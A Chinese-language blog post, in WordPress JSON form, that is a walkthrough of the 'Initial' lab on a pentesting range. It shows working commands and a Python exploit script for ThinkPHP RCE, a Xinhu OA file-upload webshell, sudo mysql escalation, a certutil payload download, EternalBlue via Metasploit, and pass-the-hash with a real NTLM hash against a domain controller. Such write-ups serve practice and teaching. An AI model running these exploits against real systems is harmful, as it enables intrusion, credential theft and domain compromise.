{"id":522,"date":"2024-11-12T16:00:23","date_gmt":"2024-11-12T08:00:23","guid":{"rendered":"http:\/\/www.s1mh0.cn\/blog\/?p=522"},"modified":"2025-03-19T09:07:36","modified_gmt":"2025-03-19T01:07:36","slug":"cqyj_initial","status":"publish","type":"post","link":"https:\/\/www.s1mh0.cn\/blog\/index.php\/2024\/11\/12\/cqyj_initial\/","title":{"rendered":"\u6625\u79cb\u4e91\u5883-Initial"},"content":{"rendered":"

Initial<\/h2>\n

\u6d89\u53ca\u7684\u77e5\u8bc6\u70b9<\/p>\n

thinkphp v5.0.23\u6f0f\u6d1e\u5229\u7528\nmysql\u7684sudo\u63d0\u6743\n\u4fe1\u547coa\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\n\u6c38\u6052\u4e4b\u84dd\n\u54c8\u5e0c\u4f20\u9012<\/code><\/pre>\n
\u652f\u7ebf\u4efb\u52a1\uff1a1\u3001\u4f7f\u7528Stowaway\u642dsocks\u4ee3\u7406\uff1b2\u3001\u5c1d\u8bd5\u4f7f\u7528\u591a\u79cd\u5de5\u5177\u8fdb\u884c\u57df\u6e17\u900f<\/p>\n
flag1<\/h3>\n
fscan\u626b\u51fatp\u7684rce\u6f0f\u6d1e<\/p>\n
start infoscan\n39.98.124.108:22 open\n39.98.124.108:80 open\n[*] alive ports len is: 2\nstart vulscan\n[*] WebTitle http:\/\/39.98.124.108      code:200 len:5578   title:Bootstrap Material Admin\n[+] PocScan http:\/\/39.98.124.108 poc-yaml-thinkphp5023-method-rce poc1<\/code><\/pre>\n
\u590d\u73b0\u786e\u5b9e\u53ef\u4ee5\u76f4\u63a5\u5229\u7528<\/p>\n
\"cqyj_initial1\"<\/p>\n
\u53ef\u4ee5\u624b\u52a8\u5199\u4e00\u53e5\u8bdd\u6728\u9a6c\uff0c\u6216\u8005\u7528\u5de5\u5177\u4e00\u628a\u68ad<\/p>\n
\"cqyj_initial2\"
\n\"cqyj_initial3\"<\/p>\n
\u8681\u5251\u8fde\u63a5<\/p>\n
\"cqyj_initial4\"<\/p>\n
\u4e4b\u540e\u53cd\u5411\u4ee3\u7406\u4e0a\u7ebf<\/p>\n
\"cqyj_initial5\"<\/p>\n
\u770b\u4e86\u51e0\u4e2asuid\u63d0\u6743\u90fd\u5229\u7528\u4e0d\u4e86\uff0csudo -l<\/code>\u53d1\u73b0\u6709mysql<\/p>\n
\"cqyj_initial6\"<\/p>\n
\u672c\u5730GTFOBins\u627emysql.md<\/p>\n
  sudo:\n    - code: sudo mysql -e '\\! \/bin\/sh'<\/code><\/pre>\n
\u4e60\u60ef\u7528bash\uff0c\u62ff\u5230flag1<\/p>\n
\"cqyj_initial7\"<\/p>\n
flag{60b53231-<\/code><\/pre>\n
flag2<\/h3>\n
\u63a5\u7740\u7528Stowaway\u642d\u4ee3\u7406<\/p>\n
.\/linux_x64_admin -l 9010 -s 123\n.\/linux_x64_agent -c vps:9010 -s 123 --reconnect 8<\/code><\/pre>\n
\"cqyj_initial8\"<\/p>\n
\"cqyj_initial9\"<\/p>\n
\u4ee3\u7406\u642d\u5efa\u6210\u529f\uff0c\u63a5\u7740\u770b\u4e0b\u5185\u7f51\u6bb5\uff0c\u5f97\u5230web1\u5185\u7f51ip\u4e3a172.22.1.15<\/code><\/p>\n
\"cqyj_initial10\"<\/p>\n
\u4f20fscan\u63a5\u7740\u626b<\/p>\n
start infoscan\ntrying RunIcmp2\nThe current user permissions unable to send icmp packets\nstart ping\n(icmp) Target 172.22.1.21     is alive\n(icmp) Target 172.22.1.2      is alive\n(icmp) Target 172.22.1.15     is alive\n(icmp) Target 172.22.1.18     is alive\n[*] Icmp alive hosts len is: 4\n172.22.1.18:445 open\n172.22.1.2:445 open\n172.22.1.21:445 open\n172.22.1.18:139 open\n172.22.1.2:139 open\n172.22.1.21:139 open\n172.22.1.18:135 open\n172.22.1.2:135 open\n172.22.1.18:80 open\n172.22.1.15:80 open\n172.22.1.15:22 open\n172.22.1.21:135 open\n172.22.1.18:3306 open\n172.22.1.2:88 open\n[*] alive ports len is: 14\nstart vulscan\n[*] NetInfo \n[*]172.22.1.2\n   [->]DC01\n   [->]172.22.1.2\n[*] NetInfo \n[*]172.22.1.21\n   [->]XIAORANG-WIN7\n   [->]172.22.1.21\n[+] MS17-010 172.22.1.21        (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)\n[*] NetInfo \n[*]172.22.1.18\n   [->]XIAORANG-OA01\n   [->]172.22.1.18\n[*] OsInfo 172.22.1.2   (Windows Server 2016 Datacenter 14393)\n[*] WebTitle http:\/\/172.22.1.15        code:200 len:5578   title:Bootstrap Material Admin\n[*] NetBios 172.22.1.2      [+] DC:DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393\n[*] NetBios 172.22.1.21     XIAORANG-WIN7.xiaorang.lab          Windows Server 2008 R2 Enterprise 7601 Service Pack 1\n[*] NetBios 172.22.1.18     XIAORANG-OA01.xiaorang.lab          Windows Server 2012 R2 Datacenter 9600\n[*] WebTitle http:\/\/172.22.1.18        code:302 len:0      title:None \u8df3\u8f6curl: http:\/\/172.22.1.18?m=login\n[*] WebTitle http:\/\/172.22.1.18?m=login code:200 len:4012   title:\u4fe1\u547c\u534f\u540c\u529e\u516c\u7cfb\u7edf\n[+] PocScan http:\/\/172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1\n\u5df2\u5b8c\u6210 14\/14\n[*] \u626b\u63cf\u7ed3\u675f,\u8017\u65f6: 11.627836097s<\/code><\/pre>\n
\u5f97\u5230\u4ee5\u4e0b\u4fe1\u606f\uff1a<\/p>\n
    \n
  • 172.22.1.18<\/code>\u4e3b\u673a\u6709web\u670d\u52a1\uff0c\u7528\u7684\u4fe1\u547cOA<\/li>\n
  • 172.22.1.21<\/code>\u4e3b\u673a\uff0c\u53ef\u4ee5\u6253\u6c38\u6052\u4e4b\u84dd<\/li>\n
  • 172.22.1.2<\/code>\u4e3a\u57df\u63a7\uff0c\u57df\u540d\u4e3axiaorang.lab <\/code><\/li>\n<\/ul>\n
    \u5148\u6253web\u6d1e\uff0c\u8fd9\u91cc\u76f4\u63a5\u7528\u5176\u4ed6\u5e08\u5085wp\u811a\u672c<\/p>\n
    \"cqyj_initial11\"<\/p>\n
    import requests\n\nsession = requests.session()\n\nurl_pre = 'http:\/\/172.22.1.18\/'\nurl1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'\nurl2 = url_pre + '\/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'\nurl3 = url_pre + '\/task.php?m=qcloudCos|runt&a=run&fileid=11'\n\ndata1 = {\n    'rempass': '0',\n    'jmpass': 'false',\n    'device': '1625884034525',\n    'ltype': '0',\n    'adminuser': 'YWRtaW4=::',\n    'adminpass': 'YWRtaW4xMjM=',\n    'yanzm': ''\n}\n\nr = session.post(url1, data=data1)\nr = session.post(url2, files={'file': open('1.php', 'r+')})\n\nfilepath = str(r.json()['filepath'])\nfilepath = "\/" + filepath.split('.uptemp')[0] + '.php'\nid = r.json()['id']\n\nurl3 = url_pre + f'\/task.php?m=qcloudCos|runt&a=run&fileid={id}'\n\nr = session.get(url3)\nr = session.get(url_pre + filepath)\nprint(r.text)\nprint(url_pre + filepath)<\/code><\/pre>\n
    \"cqyj_initial12\"<\/p>\n
    \u8681\u5251\u8fde\u63a5\u6210\u529f\u5e76\u4e14\u662fsystem\u6743\u9650<\/p>\n
    \"cqyj_initial13\"<\/p>\n
    \"cqyj_initial14\"<\/p>\n
    \u62ff\u5230flag2<\/p>\n
    \"cqyj_initial15\"<\/p>\n
    2ce3-4813-87d4-<\/code><\/pre>\n
    \u5982\u679c\u540e\u7eed\u8981\u63a5\u7740\u5229\u7528\uff0c\u5c31\u4f20\u6b63\u5411\u9a6c\u4e0a\u7ebf\uff0c\u7136\u540e\u7ee7\u7eedStowaway\u642d\u4e8c\u7ea7\u4ee3\u7406<\/p>\n
    flag3<\/h3>\n
    \u63a5\u7740\u6253\u6c38\u6052\u4e4b\u84dd\uff0c\u8fd9\u91cc\u5de5\u5177\u6253\u5b8c\u4f1a\u521b\u5efa\u4e00\u4e2a\u7ba1\u7406\u5458\u8d26\u53f7\uff0c\u8fde\u4e0aweb1\u4ee3\u7406\u540eRDP\u8fde\u63a5<\/p>\n
    \"cqyj_initial16\"<\/p>\n
    \u56e0\u4e3a\u662f\u5185\u7f51\u9776\u673a\u5e76\u4e14\u4e0d\u51fa\u7f51\uff0c\u53ea\u80fd\u4f20\u6b63\u5411\u9a6c\u4e0a\u7ebf\uff0c\u540c\u6837\u5148\u628a\u9a6c\u4f20web1\uff0c\u7136\u540epython\u5f00http\u670d\u52a1\u914d\u5408certutil\u4e0b\u8f7d<\/p>\n
    \"cqyj_initial17\"<\/p>\n
    \"cqyj_initial18\"<\/p>\n
    certutil -urlcache -split -f http:\/\/172.22.1.15:7777\/tcp_9999.exe tcp_9999.exe<\/code><\/pre>\n
    \"cqyj_initial19\"<\/p>\n
    \u6b63\u5411\u9a6c\u6210\u529f\u4e0a\u7ebf<\/p>\n
    \"cqyj_initial20\"<\/p>\n
    \u7ee7\u7eed\u5411windows\u673a\u4f20\u4e86mimikatz\u3001LaZagne\u3001psexec\u3001wmiexec\u56db\u4e2a\u5de5\u5177<\/p>\n
    \"cqyj_initial21\"<\/p>\n
    \u63a5\u7740\u5c31\u5f00\u59cb\u5c1d\u8bd5\u83b7\u53d6\u57df\u5185\u7528\u6237hash<\/p>\n
    \u9996\u5148\u524d\u9762fscan\u83b7\u53d6\u5230\u4e86\u57df\u540d\uff08\u6216\u8005\u7528net user \/domain\uff09\u4e3axiaorang.lab<\/code><\/p>\n
    \"cqyj_initial22\"<\/p>\n
    \u5c1d\u8bd5\u4e00\uff1a\u7528mimikatz\u83b7\u53d6\u57df\u5185hash\u5931\u8d25\uff0c\u65e0\u8bba\u662f\u901a\u8fc7\u7ba1\u7406\u5458\u6253\u5f00cmd\u7a97\u53e3\uff0c\u8f93\u5165<\/p>\n
    mimikatz.exe "lsadump::dcsync \/domain:xiaorang.lab \/all \/csv" exit<\/code><\/pre>\n
    \u8fd8\u662f\u4ee5\u7ba1\u7406\u5458\u8eab\u4efd\u6253\u5f00mimikatz\uff0c\u8f93\u5165<\/p>\n
    privilege::debug\nlsadump::dcsync \/domain:xiaorang.lab \/all \/csv<\/code><\/pre>\n
    \u90fd\u5229\u7528\u5931\u8d25<\/p>\n
    \"cqyj_initial23\"<\/p>\n
    \u5c1d\u8bd5\u4e8c\uff1a\u4f7f\u7528LaZagne\u5de5\u5177\u83b7\u53d6\u7528\u6237hash\u4fe1\u606f<\/p>\n
    \u8f93\u5165<\/p>\n
    laZagne.exe all<\/code><\/pre>\n
    \u4ecd\u7136\u5931\u8d25\uff08\u5e94\u8be5\u662f\u6ca1\u88c5python\uff1f\uff09<\/p>\n
    \"cqyj_initial24\"<\/p>\n
    \u7591\u60d1\uff0c\u4f46\u662f\u770b\u5176\u4ed6\u5e08\u5085\u7684wp\uff0c\u6e05\u4e00\u8272\u7528\u7684msf\u3002\u3002\u3002<\/p>\n
    \u4e4b\u540e\u5c1d\u8bd5\u7528msf\uff0c\u4f46\u662f\u6c38\u6052\u4e4b\u84dd\u6a21\u5757\u5229\u7528\u7684\u65f6\u5019\u4e00\u76f4\u4e0ewindows\u673a\u76844444\u7aef\u53e3\u5efa\u7acb\u4e0d\u4e86\u8fde\u63a5\uff0c\u5e94\u8be5\u662f\u7531\u4e8e\u524d\u9762\u5de5\u5177\u5df2\u7ecf\u5229\u7528\u8fc7\u5bfc\u81f4\u7684\uff0c\u5148\u8bb0\u5f55\u547d\u4ee4\uff08\u4e8c\u5237\uff1a\u5e94\u8be5\u662f\u4e0d\u80fd\u62ff\u63d0\u6743\u540e\u7684shell\u6765\u5f00\u4ee3\u7406\uff0c\u62ff\u4e00\u5f00\u59cb\u7684www-data\u6743\u9650\u5c31\u884c\uff09<\/p>\n
    vim \/etc\/proxychains4.conf\nproxychains4 msfconsole\nuse exploit\/windows\/smb\/ms17_010_eternalblue\nset payload windows\/x64\/meterpreter\/bind_tcp_uuid\nset RHOSTS 172.22.1.21\nexploit<\/code><\/pre>\n
    \u5f97\u5230\u57df\u5185administrator\u7684hash\uff1a10cf89a850fb1cdbe6bb432b859164c8<\/code>\uff0c\u63a5\u4e0b\u6765\u6253hash\u4f20\u9012\u653b\u51fb<\/p>\n
    \u5c1d\u8bd5\u4e00\uff1awindows \u7528 mimikatz<\/p>\n
    sekurlsa::pth \/user:administrator \/domain:172.22.1.2 \/ntlm:10cf89a850fb1cdbe6bb432b859164c8<\/code><\/pre>\n
    mimikatz\u4ecd\u7136\u5229\u7528\u5931\u8d25<\/p>\n
    \u5c1d\u8bd5\u4e8c\uff1akali \u7528 crackmapexec<\/p>\n
    proxychains4 crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "whoami"<\/code><\/pre>\n
    \"cqyj_initial25\"<\/p>\n
    proxychains4 crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type C:\\Users\\Administrator\\flag\\flag03.txt"<\/code><\/pre>\n
    \"cqyj_initial26\"<\/p>\n
    \u5c1d\u8bd5\u4e09\uff1awindows \u7528 psexec\uff0c\u80fd\u62ff\u5230system\u6743\u9650<\/p>\n
    psexec -hashes :10cf89a850fb1cdbe6bb432b859164c8 .\/administrator@172.22.1.2<\/code><\/pre>\n
    \"cqyj_initial27\"<\/p>\n
    \u5c1d\u8bd5\u56db\uff1awindows \u7528 wmiexec<\/p>\n
    wmiexec -hashes :10cf89a850fb1cdbe6bb432b859164c8 .\/administrator@172.22.1.2 "whoami"<\/code><\/pre>\n
    \"cqyj_initial28\"<\/p>\n
    \u5f97\u5230flag3<\/p>\n
    flag03: e8f88d0d43d6}<\/code><\/pre>\n
    \u62fc\u63a5\u5f97\u5230flag<\/p>\n
    flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}<\/code><\/pre>\n
    \u867d\u7136\u7ed3\u675f\u4e86\u4f46\u4e5f\u5c1d\u8bd5\u5728windows\u673a\u7528Stowaway\u642dsocsk\u4ee3\u7406<\/p>\n
    windows_x64_agent.exe -c 172.22.1.15:9020 -s 123 --reconnect 8<\/code><\/pre>\n
    \"cqyj_initial29\"<\/p>\n
    \u6210\u529f\u642d\u5efa\u4e8c\u7ea7\u4ee3\u7406\uff0cInitial\u544a\u4e00\u6bb5\u843d<\/p>\n
    \"cqyj_initial30\"<\/p>\n
    \u540e\u9762\u8ddfchu0\u5e08\u5085\u4ea4\u6d41\u4e86\u4e00\u4e0b\uff0cmimikatz\u5229\u7528\u5931\u8d25\u5e94\u8be5\u8fd8\u662f\u6743\u9650\u95ee\u9898\uff0c\u5f53\u524d\u7528\u6237\u6ca1\u6709dcsync\u6743\u9650\uff1f\u5f53\u65f6\u5728\u673a\u5668\u5bfc\u51fasam.hive\u4e0esystem.hive\u7528mimikatz\u83b7\u53d6\u672c\u673aadministrator\u7684hash\u662f\u6ca1\u95ee\u9898\u7684\uff0c\u4e0b\u6b21\u6709\u65f6\u95f4\u4e8c\u5237\u7684\u8bdd\uff0c\u5148\u6a2a\u5411\u5230administrator\u8bd5\u8bd5\uff0c\u6216\u8005\u662f\u63d0\u6743\u6210system<\/p>\n
    <\/div>","protected":false},"excerpt":{"rendered":"
    Initial \u6d89\u53ca\u7684\u77e5\u8bc6\u70b9 thinkphp v5.0.23\u6f0f\u6d1e\u5229\u7528 mysql\u7684sudo\u63d0\u6743 \u4fe1\u547coa\u6587\u4ef6 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-522","post","type-post","status-publish","format-standard","hentry","category-pentesting"],"views":431,"_links":{"self":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/522","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/comments?post=522"}],"version-history":[{"count":8,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/522\/revisions"}],"predecessor-version":[{"id":839,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/522\/revisions\/839"}],"wp:attachment":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/media?parent=522"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/categories?post=522"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/tags?post=522"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}